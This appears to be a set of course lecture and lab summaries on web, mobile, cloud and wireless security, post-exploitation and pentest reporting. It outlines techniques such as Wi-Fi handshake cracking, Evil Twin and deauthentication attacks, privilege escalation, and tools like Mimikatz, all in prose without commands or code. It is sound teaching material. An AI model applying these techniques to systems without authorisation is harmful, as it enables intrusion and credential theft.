• This lecture introduces OWASP (Open Worldwide Application Security Project). OWASP is a non-profit organisation dedicated to improving web application security. It is best known for the OWASP Top 10, a regularly updated list of the most critical web vulnerabilities. The primary goal of OWASP is to educate developers, testers, and security professionals about real-world risks and how to defend against them. By learning OWASP principles, you can gain an attacker's mindset and build more secure applications.

In this lecture, we are going to look at a simplified version of the OWASP Top 10 vulnerabilities. We will cover a range of common web security flaws, including Broken Access Control, where users can access restricted content; Injection Attacks, which involve introducing malicious code into a system; and Cryptographic Failures, which relate to poor or missing data encryption. We will also touch on issues like Insecure Design, Security Misconfiguration, and other common failures.

This lecture will introduce two essential web application security tools: Burp Suite and OWASP ZAP. We will explore how they function as intercepting proxies, allowing you to inspect and modify web traffic between your browser and the internet. We'll discuss the differences between the two, noting that Burp Suite is widely used in professional settings, while OWASP ZAP is a great free, open-source tool for beginners. We'll also cover key features like spidering and scanning.

This lecture is about Cookie Tampering and Input Validation flaws. We will learn that cookies store critical information like a user's login status, and if they are not properly protected, they can be modified by an attacker. We will see how this can be used to impersonate users or escalate privileges. We'll also cover how a lack of input validation can allow attackers to insert unexpected or malicious data into forms, leading to various types of attacks. Finally, we'll discuss defensive measures against these vulnerabilities.

In this lecture, we're going to look at Cross-Site Request Forgery (CSRF). We will learn how this attack works by tricking a user into performing an unintended action on a website where they are already authenticated. We'll examine how a malicious link or form can silently send a request on the user's behalf. We'll also discuss how websites can be tricked into thinking these requests are legitimate because they come from a user's authenticated session, and we will cover key defences like anti-CSRF tokens.

In this lab, you will use OWASP ZAP (Zed Attack Proxy), a powerful and free open-source tool for testing web application security. You will learn how to use it as an intercepting proxy to inspect and modify web traffic between your browser and the internet. The lab will cover key features such as spidering, scanning, and brute-force testing to find vulnerabilities like injection flaws and weak authentication. This demonstration will provide you with a practical understanding of how ethical hackers identify weaknesses and help you learn to build more secure applications.

This lecture we will look at Why Mobile Security Matters. We'll learn that our phones hold sensitive data like passwords, banking details, and private conversations. We will also discuss how mobile phones are a top target for attackers due to their rich data and weak security. Additionally, we'll cover the risks of using public Wi-Fi and what can happen if a device is lost or stolen. Finally, we'll see why mobile malware, including malicious apps and links, is a growing threat.

In this lecture, we will look at Common Mobile Threats. We'll cover smishing, which is a phishing attack that uses SMS messages. We will also examine the dangers of malicious apps that can steal your data or track your activity without your knowledge. We will also discuss spyware and stalkerware that can monitor a phone's usage, and the risks posed by Bluetooth and AirDrop attacks. Lastly, we'll learn about juice jacking, a method where compromised public USB charging points are used to install malware or steal data.

This lecture we will look at some Simple Steps to Stay Safe. We will cover the importance of using a strong PIN or biometric lock to protect your phone. We will also discuss the need to regularly update your phone's software and apps to ensure you have the latest security patches. We will also learn about only installing apps from trusted stores, and why it's crucial to check an app's reviews and permissions. Additionally, we will cover how to use remote wipe features and why you should turn off Bluetooth and Wi-Fi in public places.

In this lecture, we will look at two key areas. First, we will examine how to Spot the Signs of Trouble if a phone is compromised, including unusual battery drain, slow performance, strange pop-ups, and a sudden increase in data usage. Secondly, we will look at BYOD (Bring Your Own Device) & Work Phones. We will discuss how to keep personal and work data separate using different apps or profiles, and why you should follow your company's security policies. We will also discuss the need to encrypt work communications and to never share your work device.

In this lecture, we will look at BYOD (Bring Your Own Device) & Work Phones. We will discuss why it's a security risk to mix personal and work data on the same device. We'll learn how to keep data separate by using dedicated apps or profiles. We'll also cover the importance of following company security policies, including any Mobile Device Management (MDM) rules. We'll also discuss the need to encrypt work communications to protect sensitive information and why you should never share your work device with others.

This lecture covers the fundamental definition and core concepts of cloud computing. We begin by establishing that cloud computing involves using internet-based services for resources like storage, servers, and software, moving away from traditional local machines. The module explores the vast array of on-demand, scalable services available, from virtual servers to machine learning platforms, highlighting the pay as you go pricing model. You will learn about the major global providers, such as AWS, Azure, and Google Cloud, who maintain massive data centers. A key takeaway is understanding the cloud provider's role in managing the underlying hardware, physical security, and infrastructure, which allows you, the customer, to focus on leveraging these powerful services rather than maintaining the physical components yourself.

This lecture covers the essential principles of security in the cloud environment. It emphasises that moving to the cloud does not eliminate risk but changes how you manage it, requiring strong security controls just like on-premises systems. We delve into the critical role of encryption for protecting data both in transit and at rest. The module explains the necessity of robust access control to ensure only authorised users can access resources. A central theme is the Shared Responsibility Model, where the provider secures the infrastructure, but the customer must secure their data and configurations. Finally, we introduce how misconfigurations are a predominant threat, where a simple error can lead to significant data exposure.

This lecture covers the critical framework of the Shared Responsibility Model, which is the cornerstone of cloud security. We break down the distinct roles of the cloud provider and the customer in maintaining a secure environment. The provider is always responsible for the security of the cloud, including the physical data centers, hardware, and network infrastructure. Conversely, the customer is responsible for security in the cloud, which encompasses their data, applications, user access, and service configurations. The module explains how this division of duty varies depending on the service model (IaaS, PaaS, SaaS) and underscores that a misunderstanding of these roles is a leading cause of security failures and data breaches in the cloud.

This lecture covers the most prevalent threats and vulnerabilities faced in cloud environments. We identify and analyze specific risks, starting with misconfigured cloud storage, such as publicly accessible S3 buckets, which is a frequent cause of major data leaks. The module discusses the dangers of weak credentials and the lack of multi-factor authentication (MFA), which ease unauthorised access for attackers. We examine how insecure APIs can be exploited to manipulate services and extract data, and how account hijacking through phishing can lead to a complete takeover. Finally, the lecture addresses the threat of insufficient visibility and monitoring, which hinders the ability to detect and respond to incidents swiftly.

This lecture covers the key actionable strategies to build a robust security posture in the cloud. We outline fundamental best practices, beginning with implementing strong Identity and Access Management (IAM) and enforcing multi-factor authentication (MFA) to control access. The module stresses the importance of encrypting all data, both in transit and at rest, to protect its confidentiality. You will learn about the necessity of continuous logging and monitoring to gain visibility and enable rapid threat detection and response. We explain the Principle of Least Privilege to minimise potential damage from breaches. Finally, the lecture highlights the need for regular audits and reviews to proactively identify and remediate misconfigurations and security gaps.

This lecture covers the fundamental wireless standards that underpin Wi-Fi security and their inherent weaknesses. We begin by exploring the evolution of these protocols, from the outdated and highly insecure WEP, which can be cracked within minutes, to the now common WPA2, which remains vulnerable to handshake attacks and weak passwords. The module introduces the latest WPA3 standard, detailing its stronger encryption and improved defences against brute-force attempts. A central theme is understanding why wireless networks are a prime target for attackers: their radio signals can be intercepted from outside a building's perimeter. This makes the implementation of robust encryption and strong, complex passwords an absolute essential for any network's defence.

This lecture covers the practical process of cracking Wi-Fi passwords using the Aircrack-ng toolset, a popular suite for testing network security. We break down the methodology, starting with placing a wireless adapter into monitor mode to scan for networks and capture raw data packets, including the critical four-way handshake exchanged when a device connects. The module explains how, once this handshake is captured, Aircrack-ng performs a dictionary or brute-force attack against it using a wordlist to guess the password. It is crucial to emphasise that this powerful technique, which effectively demonstrates the risks of weak passwords and outdated encryption like WEP, must only be used legally in controlled labs or on networks where you have explicit permission.

In this module, we explore the Evil Twin attack, a deceptive threat where attackers create a fake Wi-Fi network identical to a legitimate one. You will learn how these malicious hotspots, often found in public places, trick users into connecting. Once connected, the attacker can intercept unencrypted data, steal login credentials, and even inject malware into your device.

We will break down how this attack is executed with minimal equipment, highlighting its accessibility to cybercriminals. Most importantly, the lesson focuses on practical defense. You will learn essential protective strategies, such as using a trusted VPN to encrypt your connection and diligently checking for HTTPS on websites. By the end, you will be equipped to identify potential Evil Twin setups and protect your personal information on any wireless network.

This lecture covers the disruptive and exploitative nature of de-authentication attacks, which target a fundamental weakness in the Wi-Fi protocol itself. We explain how these attacks forcibly disconnect all users or specific devices from a legitimate access point, an action that does not require the attacker to know the network password. The module outlines their primary uses: to capture a WPA/WPA2 handshake for offline cracking or to herd users towards an Evil Twin network. This is possible because deauthentication frames are unencrypted management messages. Finally, we discuss how these attacks are easily detectable with proper monitoring tools and can be mitigated by implementing the 802.11w standard for Protected Management Frames.

This lecture covers the essential software tools used by security professionals—and attackers—to analyse and test wireless network security. We introduce a suite of specialised programs, each with a distinct function. These include Reaver for exploiting WPS vulnerabilities, Aircrack-ng for cracking encryption, and Kismet for passive network discovery and detecting rogue access points. The module also covers Wireshark for deep packet analysis of captured traffic, Wifite for automating various attack sequences, and Fern WiFi Cracker as a user-friendly graphical option for scanning network weaknesses. Understanding these tools is key to comprehending both offensive techniques and defensive monitoring strategies.

This lecture covers the critical phase of post-exploitation, detailing the key objectives an attacker pursues after initially compromising a system. We explore the concept of maintaining access through methods like installing backdoors or creating new user accounts to ensure persistent entry. The module delves into the paramount goal of privilege escalation, the process of elevating access rights from a standard user to an administrator. You will learn about the importance of thorough information gathering to locate sensitive data and system configurations, and the practice of covering one's tracks by clearing logs and other evidence of activity to avoid detection. Finally, we discuss how attackers use this foothold to plan their next move, whether it's data exfiltration or lateral movement across the network.

This lecture covers the distinct methodologies and common techniques for privilege escalation on Windows and Linux operating systems. We compare and contrast the two environments, highlighting how Windows PrivEsc often focuses on exploiting misconfigured service permissions, insecure registry settings, and scheduled tasks. Conversely, Linux escalation frequently targets weak file permissions, SUID/GUID binaries, and unpatched kernel vulnerabilities. The module examines the native tools leveraged in each system, such as PowerShell scripts on Windows and bash commands or scripts on Linux, to automate the discovery of security misconfigurations. Understanding these OS-specific attack vectors and security models is essential for both executing and defending against privilege escalation attacks.

This lecture covers the essential tools used by security professionals and penetration testers to automate and execute post-exploitation tasks. We provide a detailed overview of three pivotal utilities: Mimikatz, a powerful Windows tool famous for extracting plaintext passwords, hashes, and Kerberos tickets from memory. PowerView, a PowerShell script used to perform reconnaissance and exploit trust relationships within an Active Directory environment. And LinPEAS, a popular Linux bash script that automatically searches for common privilege escalation vectors, from misconfigurations to software vulnerabilities. The module emphasises that these tools, while instrumental for identifying critical security gaps, must be used responsibly and strictly within legal, authorised testing scenarios to avoid misuse.

This lecture covers the defensive strategy of using deception technology to detect and analyse attacker activity. We define honeypots as deliberately vulnerable systems or services designed to lure attackers, allowing defenders to study their methods without risking real assets. The module also introduces honeytokens, which are fake digital artefacts like bogus credentials or documents embedded with alerts that trigger upon access, signalling a breach or lateral movement. These tools, including low-interaction emulations and high-interaction real systems, act as digital traps that improve threat intelligence and buy valuable time for responders. Common implementations such as the Cowrie SSH honeypot and the Modern Honey Network (MHN) are also discussed to illustrate practical applications.

This hands-on lab provides a practical introduction to deception technology by guiding you through the setup and operation of the Cowrie medium-interaction honeypot. Cowrie is designed to mimic SSH and Telnet services, effectively acting as a digital trap for attackers attempting to brute-force credentials or gain shell access.

You will begin by deploying a virtual machine and installing the Cowrie software, learning how to configure it to emulate a realistic, vulnerable system. Once operational, you will simulate attack traffic by attempting to connect to your own honeypot and observing how it captures every interaction, from login attempts to executed commands, in a controlled and secure environment.

The core of the lab focuses on analysis. You will learn to interpret Cowrie’s detailed JSON log files to extract actionable intelligence, such as attacker IP addresses, usernames and passwords used in brute-force attempts, and the specific commands they run. This exercise will solidify your understanding of how honeypots serve as an early-warning system and a valuable source of threat intelligence, allowing you to study malicious behaviour without risking your real network infrastructure.

This lecture covers the essential structure and components of an effective penetration testing report, the primary deliverable that communicates your findings. We begin by emphasising the importance of the executive summary, which must concisely explain the key results and business impact in plain, non-technical language for leadership. The module guides you on how to clearly define the scope of the engagement and the methodologies used to establish context. You will learn how to describe vulnerabilities with clarity, using evidence such as screenshots and code snippets to illustrate the real-world risk and exploit chain. Crucially, the lecture focuses on providing actionable, step-by-step remediation advice, ensuring the client knows exactly how to fix the issues. Finally, we underscore the necessity of a professional, well-structured, and jargon-free document that is proofread and sanitised of any sensitive information.

This lecture covers the standard risk rating matrix used to categorise and prioritise vulnerabilities based on their potential business impact and likelihood of exploitation. We break down the five common severity levels, starting with Critical risks that demand immediate attention due to their potential for major system compromise or data breach. High-risk issues are serious and easily exploitable, leading to significant consequences like data theft. Medium-risk vulnerabilities are exploitable but may require specific conditions, while Low-risk findings pose a minimal threat. Finally, Informational items do not represent a direct threat but provide useful context for hardening defences. This framework is essential for helping stakeholders understand where to focus their resources and for justifying the prioritisation of remediation efforts.

This lecture covers the critical soft skills required to communicate complex technical security findings effectively to an audience without a technical background, such as executives or managers. The key is to use plain language, avoiding jargon and acronyms, and to consistently translate technical vulnerabilities into clear business impacts concerning operations, finance, and reputation. We discuss the technique of storytelling to create a narrative around the testing process and findings, making the information more relatable and memorable. The module advises you to highlight only the top risks to avoid overwhelming your audience and to always pair every problem presented with a practical, business-focused solution or recommended next step, fostering a constructive dialogue rather than simply delivering a list of failures.

This lecture covers the level of granular technical detail required in the appendices or technical sections of a report to ensure findings are reproducible, actionable, and verifiable by technical teams. We stress the importance of meticulously listing all tools and their specific version numbers to eliminate ambiguity. The module instructs you to include the exact payloads, commands, and exploit code used, moving beyond generic labels to provide proof of concept. You will learn to provide detailed, step-by-step instructions that allow another engineer to replicate the vulnerability reliably. This includes documenting the precise environment details, such as OS, user privileges, and service versions, that were relevant to the exploit. Finally, we emphasise using supporting evidence like terminal logs, HTTP requests/responses, and screenshots to validate every finding conclusively.